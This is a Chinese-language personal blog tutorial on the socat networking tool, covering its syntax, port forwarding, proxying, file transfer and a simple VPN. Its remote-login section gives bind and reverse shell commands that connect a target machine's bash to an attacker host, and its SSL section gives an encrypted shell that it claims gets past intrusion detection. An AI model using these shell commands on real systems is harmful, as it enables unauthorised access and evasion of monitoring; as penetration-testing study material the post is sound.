<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/rick2.jpg?v=2.6.2" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/rick2.jpg?v=2.6.2" type="image/png" sizes="32x32"><meta name="description" content="简介 ： socat（英文全拼：Socket CAT）是 Linux 下的一个多功能的网络工具，其功能与有瑞士军刀之称的 Netcat 类似，可以看作是 Netcat 的加强版。socat 的主要特点就是在两个数据流之间建立通道，这些数据通道包含文件、管道、设备（终端或调制解调器等）、Socket、SSL、SOCKS4 客户端或代理 CONNECT。 socat 支持众多协议和链接方式，如 IP、">
<meta property="og:type" content="article">
<meta property="og:title" content="Socat介绍及利用">
<meta property="og:url" content="https://p2vn.github.io/2021/10/11/Socat%E4%BB%8B%E7%BB%8D%E5%8F%8A%E4%BD%BF%E7%94%A8/index.html">
<meta property="og:site_name" content="P2un&#39;s">
<meta property="og:description" content="简介 ： socat（英文全拼：Socket CAT）是 Linux 下的一个多功能的网络工具，其功能与有瑞士军刀之称的 Netcat 类似，可以看作是 Netcat 的加强版。socat 的主要特点就是在两个数据流之间建立通道，这些数据通道包含文件、管道、设备（终端或调制解调器等）、Socket、SSL、SOCKS4 客户端或代理 CONNECT。 socat 支持众多协议和链接方式，如 IP、">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://blogforp2un.oss-cn-shenzhen.aliyuncs.com/images/202205091030094.png">
<meta property="og:image" content="https://blogforp2un.oss-cn-shenzhen.aliyuncs.com/images/202205091030510.png">
<meta property="og:image" content="https://blogforp2un.oss-cn-shenzhen.aliyuncs.com/images/202205091030314.png">
<meta property="og:image" content="https://blogforp2un.oss-cn-shenzhen.aliyuncs.com/images/202205091031696.png">
<meta property="og:image" content="https://blogforp2un.oss-cn-shenzhen.aliyuncs.com/images/202205091031509.png">
<meta property="og:image" content="https://blogforp2un.oss-cn-shenzhen.aliyuncs.com/images/202205091031784.png">
<meta property="og:image" content="https://blogforp2un.oss-cn-shenzhen.aliyuncs.com/images/202205091031114.png">
<meta property="og:image" content="https://blogforp2un.oss-cn-shenzhen.aliyuncs.com/images/202205091031548.png">
<meta property="og:image" content="https://blogforp2un.oss-cn-shenzhen.aliyuncs.com/images/202205091112720.png">
<meta property="og:image" content="https://blogforp2un.oss-cn-shenzhen.aliyuncs.com/images/202205091112428.png">
<meta property="article:published_time" content="2021-10-10T16:00:00.000Z">
<meta property="article:modified_time" content="2021-10-10T16:00:00.000Z">
<meta property="article:author" content="P2un">
<meta property="article:tag" content="工具使用">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://blogforp2un.oss-cn-shenzhen.aliyuncs.com/images/202205091030094.png"><title>Socat介绍及利用 | P2un's</title><link ref="canonical" href="https://p2vn.github.io/2021/10/11/Socat%E4%BB%8B%E7%BB%8D%E5%8F%8A%E4%BD%BF%E7%94%A8/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.6.2"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: undefined,
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"light","wordWrap":false},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"Copy","copySuccess":"Copy Success","copyError":"Copy Error"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 6.1.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">Home</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">Archives</span></a></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">P2un's</div><div class="header-banner-info__subtitle"></div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">Socat介绍及利用</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">Created</span><span class="post-meta-item__value">2021-10-11</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">Updated</span><span class="post-meta-item__value">2021-10-11</span></span></div></header><div class="post-body"><p><strong>简介 ：</strong></p>
<p>socat（英文全拼：Socket CAT）是 Linux 下的一个多功能的网络工具，其功能与有瑞士军刀之称的 Netcat 类似，可以看作是 Netcat 的加强版。socat 的主要特点就是在两个数据流之间建立通道，这些数据通道包含文件、管道、设备（终端或调制解调器等）、Socket、SSL、SOCKS4 客户端或代理 CONNECT。</p>
<p>socat 支持众多协议和链接方式，如 IP、TCP、 UDP、IPv6、PIPE、EXEC、System、Open、Proxy、Openssl、Socket 等。支持广播和多播、抽象 Unix sockets、Linux tun&#x2F;tap、GNU readline 和 PTY，并提供了分叉、记录和进程间通信的不同模式。</p>
<p>.</p>
<p>.</p>
<p><strong>语法 ：</strong></p>
<ul>
<li><p><strong>socat [ 选项 ] &lt; 地址一 &gt; &lt; 地址二 &gt;</strong></p>
<ul>
<li><p><strong>选项：</strong></p>
<ul>
<li><img src="https://blogforp2un.oss-cn-shenzhen.aliyuncs.com/images/202205091030094.png" alt="image-20211122110721124"></li>
</ul>
</li>
<li><p><strong>地址：</strong></p>
<ul>
<li><p>使用 socat 需要提供兩個地址，然後 socat 做的事情就是把這兩個地址的數據流串起來，把第左邊地址的輸出數據傳給右邊，同時又把右邊輸出的數據傳到左邊。</p>
<p>地址就类似于一个文件描述符，socat所做的工作就是在2个地址指定的描述符间建立一个pipe用于发送和接收数据。</p>
</li>
<li><p>基础例子：</p>
<ul>
<li><p>最簡單的地址就是一個減號 “-”，代表標準輸入輸出，而在命令行輸入：</p>
<p><strong>socat - -</strong></p>
<p>就表示把标准输入和标准输出对接，输入什么就在shell中输出什么，类似于无参数的 cat 命令。</p>
</li>
<li><p>除了 - 减号符号代表的地址外，还支持 TCP, TCP-LISTEN, UDP, UDP-LISTEN, OPEN, EXEC, SOCKS, PROXY 等多種地址，用於端口監聽、鏈接，文件和進程讀寫，代理橋接等等</p>
</li>
<li><p>各种地址：</p>
<p><img src="https://blogforp2un.oss-cn-shenzhen.aliyuncs.com/images/202205091030510.png" alt="image-20211122153715018"></p>
</li>
</ul>
</li>
<li><p>地址参数的详细格式：</p>
<ul>
<li>以一个协议名开头，接着以冒号分隔主要参数，接着以逗号分隔细节选项参数</li>
<li><strong>协议：参数一：参数二，选项一，选项二</strong></li>
<li>举例：一个以 TCP 协议连接的网站的 80 端口 的地址应该这么写<ul>
<li>TCP4：<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="http://www.somewebsite123.com/" >www.somewebsite123.com</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span> ：80</li>
<li>上面的例子没有写选项，但在之后可以附加一些选项，用逗号隔开，如fork，reuseaddr，stdin，stdout，ctty等。</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>.</p>
<p>.</p>
<p><strong>常用功能 ：</strong></p>
<p>.</p>
<ul>
<li><p><strong>1、网络连接：</strong></p>
<p>类似 nc 的监听和连接，可以一边使用 nc 监听， 一边使用 socat 连接</p>
<ul>
<li><p><strong>监听端</strong>：socat — TCP-LISTEN：8080 （表示在监听端机器开启8080端口进行监听）</p>
</li>
<li><p><strong>连接端</strong>：socat — TCP：监听端 IP ：8080 （表示连接端向监听端的8080端口发起连接）</p>
</li>
<li><p>解释：</p>
<ul>
<li><p>在終端 1 上輸入第一行命令作爲服務端，並在終端 2 上輸入第二行命令作爲客戶端去鏈接。</p>
<p>聯通後在終端 2 上隨便輸入點什麼，就能顯示在終端 1 上，反之亦然，因爲兩條命令都是把標準輸入輸出和網絡串起來，因此把兩個地址交換一下也是等價的：</p>
<p><img src="https://blogforp2un.oss-cn-shenzhen.aliyuncs.com/images/202205091030314.png" alt="image-20211122113822589"></p>
<p>因爲 socat 就是把左右兩個地址的輸入輸出接在一起，因此顛倒左右兩個地址影響不大，除非前面指明 -u 或者 -U 顯示指明數據 “從左到右” 還是“從右到左”。</p>
</li>
<li><p>同 netcat 一樣，如果客戶端結束的話，服務端也會結束，但是 socat 還可以加額外參數：</p>
<p><img src="https://blogforp2un.oss-cn-shenzhen.aliyuncs.com/images/202205091031696.png" alt="image-20211122113916858"></p>
<p>服務端在 TCP-LISTEN 地址後面加了 fork 的參數後，就能同時應答多個鏈接過來的客戶端，每個客戶端會 fork 一個進程出來進行通信，加上 reuseaddr 可以防止鏈接沒斷開玩無法監聽的問題。</p>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>.</p>
<ul>
<li><p><strong>2、端口转发：</strong></p>
<ul>
<li><p>基础例子：</p>
<p><strong>监听端：socat TCP-LISTEN：8080，fork，resuseaddr TCP：192.168.1.xxx：80</strong></p>
<p>.</p>
</li>
<li><p>解释：</p>
<ul>
<li><p>在主機上監聽一個 8080 端口，將 8080 端口所有流量轉發給指定機器的 80 端口</p>
</li>
<li><p>連到這臺機器上 8080 端口的所有鏈接，相當於鏈接了 192.168.1.xxx 這臺機器的 80 端口，<strong>命令中交換左右兩個地址一樣是等價的</strong>。</p>
</li>
<li><p>這裏 socat 比 nc 強的地方就體現出來了，nc 做轉發時只能轉發 1 次，第一條鏈接 accept 並且關閉以後 nc 就退出了，無法接受新鏈接，因此 nc 只適合單次使用。</p>
<p>而 socat 加上 <strong>fork</strong> 以後，每次 accept 一個鏈接都會 fork 出一份來不影響接收其他的新連接，這樣 socat 就可以當一個端口轉發服務，一直啓動在那裏。</p>
<p><strong>reuseaddr</strong> 设置本地端口可重复使用。</p>
<p>還可以用 <strong>supervisor</strong> 託管起來，開機自動啓動。</p>
<p>還可以用這個功能暴露一些 127.0.0.1 的端口出來供外面訪問，比起 nc 的臨時救急使用一下的場景，socat 是可以當一個服務長期運行的。</p>
</li>
</ul>
</li>
<li><p>使用场景：</p>
<ul>
<li><p>在实际生产中我们经常会遇到到一个场景就是，用一台机器作为转发服务器，连接 AB 两个网段，将转发服务器的某个端口上的流量转发到 B 网段的某台机器的某个端口，这样 A 网段的服务器就可以通过访问转发服务器上的端口访问到 B 网段的服务器端口。</p>
<p>这样的场景一般在和客户建立专线的连接时候经常用到，一般也可以采用 iptables 做转发，但是比较复杂。socat 可以很轻松的完成这个功能，但是 socat 不支持端口段转发，只适用于单端口或者少量端口。</p>
</li>
</ul>
</li>
<li><p>实用例子：</p>
<ul>
<li><p>socat -d -d -lf &#x2F;var&#x2F;log&#x2F;socat.log TCP4-LISTEN：15672 ，bind&#x3D;192.168.1.252，reuseaddr，fork TCP4：172.17.0.15：15672</p>
<p>参数说明：</p>
<ul>
<li><p>-d -d ：</p>
<p>前面两个连续的 <code>-d</code> <code>-d</code> 代表调试信息的输出级别</p>
<p><strong>pwk 中的解释</strong>：supply the <strong>-d -d</strong> option to increase verbosity （showing fatal, error, warning, and notice messages)</p>
</li>
<li><p>-lf &#x2F;var&#x2F;log&#x2F;socat.log ：</p>
<p>指定输出信息的文件保存位置</p>
</li>
<li><p>TCP4-LISTEN：15672：</p>
<p>本地建立一个 TCP IPv4 协议的监听端口，也就是转发端口。这里是 15672，请根据实际情况改成你自己需要转发的端口。</p>
</li>
<li><p>bind&#x3D;192.168.1.252 ：</p>
<p>指定监听绑定的 IP 地址</p>
</li>
<li><p>reuseaddr :</p>
<p>设置本地端口可重复使用</p>
</li>
<li><p>fork ：</p>
<p>每次 accept 一個鏈接都會 fork 出一份來不影響接收其他的新連接，這樣 socat 就可以當一個端口轉發服務，一直啓動在那裏</p>
<p><strong>pwk 中的解释：</strong></p>
<p><strong>fork creates a child process once a connection is made to the listener, which allows multiple connections</strong></p>
</li>
</ul>
</li>
<li><p><img src="https://blogforp2un.oss-cn-shenzhen.aliyuncs.com/images/202205091031509.png" alt="image-20211122122355562"></p>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>.</p>
<p>&#x2F;</p>
<ul>
<li><p><strong>3、端口映射： （先搞清楚端口转发和端口映射的区别）</strong></p>
<ul>
<li><p>在一个 NAT 网络环境中，也是可以通过 socat 将内部机器端口映射到公网上的。</p>
</li>
<li><p>外部公网机器：</p>
<ul>
<li>socat tcp-listen：1234 tcp-listen：3389</li>
</ul>
</li>
<li><p>内部私网中的机器：</p>
<ul>
<li>socat tcp：outerhost：1234 tcp：192.168.1.34：3389</li>
</ul>
</li>
<li><p>上面的解释：</p>
<ul>
<li>这样，外部机器上的 3389 就映射在内网 192.168.1.34 的 3389 端口上，实现私网穿透。</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>.</p>
<p>&#x2F;</p>
<ul>
<li><p><strong>4、远程登录（shell 连接）</strong></p>
<ul>
<li><p>之前我们说地址除了 TCP 和 TCP-LISTEN 外，另外一個重要的地址類型就是 EXEC 可以執行程序並且把輸入輸出和另外一個地址串起來</p>
<p>既然如此，就能够利用这点进行传 shell，同样分为 正向 shell 和 反向 shell</p>
</li>
<li><p>正向 shell：</p>
<ul>
<li>监听端：socat TCP-LISTEN：8080，fork，reuseaddr EXEC：&#x2F;usr&#x2F;bin&#x2F;bash # 靶机端提供 shell</li>
<li>连接端：socat - TCP：监听端 IP：8080 # 攻击机连接已知公网 IP 的靶机，然后获取到 shell</li>
</ul>
</li>
<li><p>反向 shell：</p>
<ul>
<li>连接端：socat TCP：攻击机 IP：8080 EXEC：&#x2F;usr&#x2F;bin&#x2F;bash #靶机主动连接攻击机，并传shell</li>
<li>监听端：socat TCP-LISTEN：8080，fork，reuseaddr - #攻击机监听连接，并开启 fork,reuseaddr选项</li>
</ul>
</li>
<li><p>一点完善，这里使用正向 shell 的情况演示：</p>
<ul>
<li><p>监听端（靶机）：socat TCP-LISTEN：8099，fork，reuseaddr EXEC:&#x2F;usr&#x2F;bin&#x2F;bash，pty，stderr</p>
</li>
<li><p>连接端（攻击机）：socat file：’ &#x2F;dev&#x2F;tty ‘，raw，echo&#x3D;0 TCP：监听端 IP ：8099</p>
<ul>
<li><p>监听端的意思是，把 stderr 标准错误输出重定向给监听端口的标准输出，把 pty （伪终端）也重定向给监听端口绑定的连接。简单来说就是给 连接端 送一个在 pty 中运行的 shell，且标准错误输出也送过去</p>
</li>
<li><p>连接端的意思是，使用 tty 的方式访问，這樣基本就得到了一個全功能的交互式終端了，可以在裏面運行 vim, emacs 之類的程序。</p>
<p>file:’&#x2F;dev&#x2F;tty’：表示和 &#x2F;dev&#x2F;tty 这个文件进行交互，这样 ctrl+c 也退出不了 连接</p>
<p>raw ： 表示地址后面跟的选项参数，生肉输出，大概是完整输出</p>
<p>echo&#x3D;0 ：可以让输入的命令不在 shell 中重复出现一次</p>
<p>具体可参考：</p>
<p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://unix.stackexchange.com/questions/165288/socat-disable-double-echo" >https://unix.stackexchange.com/questions/165288/socat-disable-double-echo</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
</li>
</ul>
</li>
</ul>
</li>
<li><p>更高级的完善：</p>
<ul>
<li><p>正向连接的监听端（靶机）：</p>
<p>socat TCP-LISTEN：23，reuseaddr，fork，crlf exec：&#x2F;bin&#x2F;login，pty，setsid，setpgid，stderr，ctty</p>
</li>
<li><p>解释：</p>
<ul>
<li><p>crlf ：Carriage return &amp; line feed，意思是回车和换行。也可以用 crln ，跟在地址参数后面表示把接收到的 \n 转化成换行，或者相反</p>
<p><img src="https://blogforp2un.oss-cn-shenzhen.aliyuncs.com/images/202205091031784.png" alt="image-20211122152417190"></p>
<p>参考链接：</p>
<p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.coder.work/article/2567706" >https://www.coder.work/article/2567706</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://stackoverflow.com/tags/socat/hot?filter=all" >https://stackoverflow.com/tags/socat/hot?filter=all</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
</li>
<li><p>setsid，setpgid，ctty：相当与使用 root 在运行 <strong>？？？？（后面补充完整）</strong></p>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>.</p>
<p>&#x2F;</p>
<ul>
<li><p>5、网页服务器：</p>
<ul>
<li><p>首先編寫一個腳本：web.sh</p>
<p><img src="https://blogforp2un.oss-cn-shenzhen.aliyuncs.com/images/202205091031114.png" alt="image-20211122154641697"></p>
</li>
<li><p>這裏我們用 SYSTEM 地址類型代替原來的 EXEC 執行命令，因爲可以後面寫 shell 命令：</p>
<ul>
<li>socat TCP-LISTEN：8099，fork，reuseaddr SYSTEM：”bash .&#x2F;web.sh”h</li>
</ul>
</li>
<li><p>或者如下，做一个简易版的网页除错器</p>
<ul>
<li>socat TCP-LISTEN：8000，crlf SYSTEM：”echo HTTP&#x2F;1.0 200； echo Content-Type: text&#x2F;plain; echo; cat”</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>.</p>
<p>&#x2F;</p>
<ul>
<li>6、文件传输：<ul>
<li>接受端： socat -u TCP-LISTEN：8009 open：record.log ，create</li>
<li>发送端： socat -u open：record.log TCP：接收端 IP：8009<ul>
<li>這裏用了 -u 參數，意思是數據從左邊的地址單向傳輸到右邊的地址，大寫 -U 的話是從右邊單向傳輸到左邊。</li>
<li>传完了会自动结束，这点比 netcat 要更优秀</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>.</p>
<p>&#x2F;</p>
<ul>
<li><p>7、读写分流：</p>
<ul>
<li><p>socat 具有一个独特的读写分流功能，比如：可以实现一个假的 Web Server，客户端连过来之后就把 read.html 里面的内容传过去，同时把客户端的数据保存到 write.txt 里面。</p>
</li>
<li><p>监听端：</p>
<ul>
<li><p>socat open：read.html \ ! \ ! open：write.txt，create，append tcp-listen：8000，reuseaddr，fork</p>
<p>注意：!! 符号用于合并读写流，前面的用于读，后面的用于写。由于 ! 在 Shell 中是特殊字符，所以这里在命令行中使用 \ 对其进行了转义。</p>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>.</p>
<p>&#x2F;</p>
<ul>
<li>8、文件操作（本地）：<ul>
<li>通过 socat 读取一个本地的文件，并在终端显示<ul>
<li>socat - &#x2F;etc&#x2F;sysctl.conf</li>
</ul>
</li>
<li>通过 socat 将一段文本写入一个本地文件<ul>
<li>echo “hello sb” | socat - &#x2F;temp&#x2F;hello.sh</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>.</p>
<p>&#x2F;</p>
<ul>
<li>9、透明代理：<ul>
<li>用於 socks 代理的监听端：<ul>
<li>socat TCP-LISTEN：&lt;本地端口&gt;，reuseaddr，fork SOCKS：&lt;代理服務器IP&gt;：&lt;遠程地址的域名&gt;：&lt;遠程端口&gt;，socksport&#x3D;&lt;代理服務器端口&gt;</li>
</ul>
</li>
<li>用于 http 代理的监听端：<ul>
<li>socat TCP-LISTEN：&lt;本地端口&gt;，reuseaddr，fork PROXY：&lt;代理服務器IP&gt;：&lt;遠程地址的域名&gt;：&lt;遠程端口&gt;，proxyport&#x3D;&lt;代理服務器端口&gt;</li>
</ul>
</li>
<li>他們都可以把本地端口的請求轉換成使用代理服務器訪問的請求，比如：<ul>
<li>socat TCP-LISTEN：1234，fork SOCKS4A：127.0.0.1：google.com：80，socksport&#x3D;5678</li>
<li>那麼请求本地的 1234 端口，相當於通過代理服務器 127.0.0.1:5678 去访问 google.com 的 80 端口了，這裏用了 SOCKS4A ，後面 A 的意思是讓代理服務器去解析域名。</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>.</p>
<p>&#x2F;</p>
<ul>
<li><p>10、SSL 连接（通过 openssl 来加密传输过程）</p>
<ul>
<li><p>前面我们使用 socat 传 shell 的时候，其实交流的内容是明文传输的。为了让信息传输更加安全，我们借助 SSL 证书来完成这个操作。像 SSL 这种程度的加密，基本上就能绕过 入侵检测系统 （IDS）</p>
</li>
<li><p>具体操作：</p>
<ul>
<li><p>首先使用 openssl 这个软件，生成一个自签证书，使用到以下参数</p>
<ul>
<li>req：初始化一个新的证书签名请求</li>
<li>-newkey：生成一个新的私玥</li>
<li>rsa:2048 ：使用 RSA 加密方式，且密钥长度是 2048 位 （bit）</li>
<li>-nodes ：以无密码验证（无密码保护）的方式储存私钥</li>
<li>-keyout ：把密钥储存到一个文件中</li>
<li>-x509 ：输出一个自签证书而不是一个证书请求</li>
<li>-days ： 设置密钥有效期</li>
<li>-out ：把证书保存到一个文件中</li>
</ul>
</li>
<li><p>上述操作会生产一个证书，和一个密钥。</p>
<p>为了让 socat 可以识别我们的证书和密钥，首先要把证书和密钥放进同一个文件中，并以 .pem 格式保存</p>
<p>具体演示图：</p>
<p><img src="https://blogforp2un.oss-cn-shenzhen.aliyuncs.com/images/202205091031548.png" alt="image-20211125111542845"></p>
</li>
<li><p>现在就是用 socat 生产加密 shell （正向 shell）</p>
<ul>
<li><p>监听端：</p>
<p><strong>sudo socat OPENSSL-LISTEN：443，cert&#x3D;bind_shell.pem，verify&#x3D;0，fork EXEC：&#x2F;bin&#x2F;bash</strong></p>
<p>We will use the OPENSSL-LISTEN option to create the listener on port 443, cert&#x3D;bind_shell.pem to specify our certificate file, verify to disable SSL verification, and fork to spawn a child process once a connection is made to the listener</p>
</li>
<li><p>连接端：</p>
<p><strong>socat - OPENSSL：监听端的 IP：443，verify&#x3D;0</strong></p>
<p>We will use <strong>-</strong> to transfer data between <em>STDIO</em> and the remote host, <strong>OPENSSL</strong> to establish a remote SSL connection to Alice’s listener on 10.11.0.4:443, and <strong>verify&#x3D;0</strong> to disable SSL certificate verification</p>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>.</p>
<p>&#x2F;</p>
<ul>
<li>11、搭建简单 VPN<ul>
<li>监听端：<ul>
<li>socat -d -d TCP-LISTEN:11443,reuseaddr TUN:192.168.255.1&#x2F;24,up</li>
</ul>
</li>
<li>连接端：<ul>
<li>socat TCP:1.2.3.4:11443 TUN:192.168.255.2&#x2F;24,up</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>.</p>
<p>.</p>
<p><strong>socat 工作原理：</strong></p>
<ul>
<li><img src="https://blogforp2un.oss-cn-shenzhen.aliyuncs.com/images/202205091112720.png" alt="image-20211122174215378"><ul>
<li><img src="https://blogforp2un.oss-cn-shenzhen.aliyuncs.com/images/202205091112428.png" alt="image-20211122174241267"></li>
</ul>
</li>
</ul>
<p>.</p>
<p>.</p>
<p>&#x2F;</p>
<p><strong>参考：</strong></p>
<ul>
<li><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/uzb7CDOClfpzU5dv7uhJ_Q" >https://mp.weixin.qq.com/s/uzb7CDOClfpzU5dv7uhJ_Q</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></li>
<li><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://getiot.tech/linux-command/socat.html" >https://getiot.tech/linux-command/socat.html</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></li>
<li><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://officeguide.cc/socat-multipurpose-relay-bidirectional-data-transfer-tutorial-examples/" >https://officeguide.cc/socat-multipurpose-relay-bidirectional-data-transfer-tutorial-examples/</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></li>
<li><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="http://brieflyx.me/2015/linux-tools/socat-introduction/" >http://brieflyx.me/2015/linux-tools/socat-introduction/</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></li>
<li><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://payloads.online/tools/socat/" >https://payloads.online/tools/socat/</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></li>
<li><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://notes.leconiot.com/socat.html" >https://notes.leconiot.com/socat.html</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></li>
<li><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.cnblogs.com/simon7s/p/12393443.html" >https://www.cnblogs.com/simon7s/p/12393443.html</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></li>
<li><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://manpages.debian.org/stretch/socat/socat.1.en.html" >https://manpages.debian.org/stretch/socat/socat.1.en.html</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></li>
<li><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://unix.stackexchange.com/questions/165288/socat-disable-double-echo" >https://unix.stackexchange.com/questions/165288/socat-disable-double-echo</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></li>
<li><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.cnblogs.com/sparkdev/p/11605804.html" >https://www.cnblogs.com/sparkdev/p/11605804.html</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></li>
</ul>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ END ------</div></div><div class="post-tags"><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="https://p2vn.github.io/tags/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/">工具使用</a></span></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2021/11/01/windows%20access%20token/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">Windows access token 介绍及利用</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2021/09/01/%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86/"><span class="paginator-prev__text">栈溢出漏洞原理</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">Catalog</span><span class="sidebar-nav-ov">Overview</span></div><section class="sidebar-toc"></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="/images/icons/rick2.jpg" alt="avatar"></div><p class="sidebar-ov-author__text">//Try Harder//</p></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">6</div><div class="sidebar-ov-state-item__name">Archives</div></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">You have read </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2021~2022</span><span class="footer__icon"><i class="fas fa-camera-retro"></i></span><span>P2un</span></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="/js/utils.js?v=2.6.2"></script><script src="/js/stun-boot.js?v=2.6.2"></script><script src="/js/scroll.js?v=2.6.2"></script><script src="/js/header.js?v=2.6.2"></script><script src="/js/sidebar.js?v=2.6.2"></script></body></html>